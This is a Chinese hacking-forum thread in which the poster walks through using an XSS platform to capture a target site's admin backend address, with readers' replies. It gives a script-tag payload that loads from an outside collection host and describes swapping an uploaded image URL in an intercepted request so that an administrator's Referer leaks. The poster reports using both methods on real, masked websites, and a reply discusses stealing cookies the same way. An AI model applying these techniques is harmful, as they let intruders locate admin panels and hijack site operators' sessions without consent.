导航

xss简单讲解之获取后台地址

#1
本帖最后由 Shrimp 于 2017-3-11 16:27 编辑

首先,大家先看完我的简述然后在考虑是否踩我,真心谢谢。
第一:这篇文章特别特别特别水!(别浪费时间看了,适合新手看,所以我发在了水区)


好了,这里做一个简单的教程,获取管理员后台地址的教程。


首先,如下图,坛子里有个人私信我,如下图:




说实话,对这种行为个人略微有些反感。



【案例一 不可植入XSS代码】这里大家注意,这个人只问我要后台地址,估测他可能有后台管理员账号和密码了,但是找不到后台地址,我这么理解的。
很多时候大家获取到了管理的账号密码,却找不到后台地址,而这个网站还不存在注入、XSS等问题,虽然有了管理账号和密码,但是却无任何用处。
正好这个案例就是这样。
我们先登录第二个网址:www.xxxx.net/



习惯性,的直接进入发布供求信息页面。一般这样的页面都会存在XSS,让我们来试验一下。如图。我们先来到自己的XSS平台源码处(这步真是废话,但是一点点说么)



这里就是你的XSS平台给你的   JS代码,你只需要复制其中的代码,例如我复制的是:<sCRiPt sRC=http://xxx.xxx/xxx1></sCrIpT>

然后 再次回到我们要攻击的网站

仔细看图片

然后发布文章,不过这个时候问题出现了,注意下图



提示有风险,简单的说禁止放入恶意代码。 如果是这样的话那怎么办?不过刚才已经说了,我们只需要获取管理员的后台地址,那么我们可以剑走偏锋!利用图片来获取对方的Referer 。

大家仔细看上面的上面的图片,有一处上传图片,我们随便上传一个图片,然后数据抓包
注意图片中我画箭头的两个地方。



明显是图片地址对吧,  我们只需要把这个图片地址替换成我们XSS平台提供的图片地址即可,自己可以看上方XSS平台已经提供了 专用的图片地址。

替换后的数据包



注意到了么,然后我们提交以下。。。。看一下最终结果。




看到了吧,只要管理员看到我这个信息,或者说看到了我这个图片,XSS平台就会获取到管理员的后台地址。   SO。。 下一步就是等XSS平台信息了。

下面这个图,是我自己获取到的自己的信息。。。。



最后就是坐等管理员看了。
补图、:::::::管理员中招的图片






【案例二 可植入XSS代码】先讲第一个网站吧:www.xxxx.net.cn   如果利用XSS获取这个网站后台呢。大家可以注册一个账户,然后来到后台的任意地方。
如下地址:http://member.xxxx.net.cn/Company/Contact?menuType=Company&;submenuFlag=CompanyContact



看到了吧,随便找个地方 放入XSS平台生成的代码,然后我们就坐等结果。


最后XSS平台接受到的结果,如图:

个人博客:https://woj.app
打人不打脸,求放过。
2017-03-10
#2
1.短消息图片露点了
2.学到了图片获取后台地址
2017-03-10
#3
图片xss第一次看到
2017-03-10
#4
回复 2# apttip
没露点。
2017-03-10
#5
第一个那个官网以前有N多注入,没记错的话,貌似会员数量是百万级
2017-03-10
#6
亮点就在 图片获取上。。不错 顶了
2017-03-11
#7
楼主莆田人吗  哈
2017-03-11
#8
本帖最后由 Shrimp 于 2017-3-11 16:30 编辑

第一个案例 管理员中招后的图片
个人博客:https://woj.app
打人不打脸,求放过。
2017-03-11
#9
回复 8# Shrimp
表哥我用的你的XSS平台用默认的项目建了一个获取cookie的xss,然后本地建立一个html文档打开,但是获取不到信息,请问下是因为浏览器拦截吗?我用的是搜狗浏览器
2017-03-11
#10
回复 9# Anonymous
任何信息都获取不到???  如果获取不到cookie可能正常  但是任何信息获取不到  不可能吧,你确定代码没问题?你是一步一步安装的程序?